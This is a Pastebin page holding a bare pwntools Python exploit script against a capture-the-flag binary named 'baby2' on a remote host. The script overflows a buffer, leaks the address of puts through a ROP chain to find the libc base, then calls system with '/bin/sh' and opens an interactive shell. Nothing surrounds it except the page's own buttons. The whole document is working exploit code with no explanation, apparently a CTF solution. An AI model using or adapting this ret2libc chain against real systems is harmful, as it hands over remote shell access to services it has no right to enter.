Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- from pwn import *
- offset = 24
- libc = ELF("./libc.so.6")
- #r = process("./baby2")
- r = remote("baby-01.pwn.beer",10002)
- pop_rdi = 0x0000000000400783
- printf_got = 0x000000601fd0
- puts_got = 0x000000601fc8
- printf_plt = 0x0000000000400560
- puts_plt = 0x0000000000400550
- main = 0x0000000000400698
- def un64(data):
- return int(data[::-1].encode("hex"),16)
- p = "a" * offset
- p += p64(pop_rdi)
- p += p64(puts_got)
- p += p64(puts_plt)
- p += p64(main)
- #r.recvuntil("input: ")
- #gdb.attach(r)
- r.sendlineafter("input: ",p)
- puts_leak = un64(r.recv(8).replace("\n",""))
- log.info("leaking libc puts@got : " + hex(puts_leak))
- libc_base = puts_leak - libc.symbols['puts']
- system = libc_base + libc.symbols['system']
- binsh = libc_base + libc.search("/bin/sh").next()
- #libc_base = puts_leak - 0x0809c0
- #system = libc_base - 0x31580
- #binsh = libc_base + 0x1334da
- p2 = "A" * 24
- p2 += p64(pop_rdi)
- p2 += p64(binsh)
- p2 += p64(system)
- p2 += "A"*8
- log.info("binsh at : " + hex(binsh))
- log.info("system at : " + hex(system))
- log.info("libc_base at : " + hex(libc_base))
- #r.recvuntil("input: ")
- r.sendlineafter("input: ",p2)
- r.interactive()
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement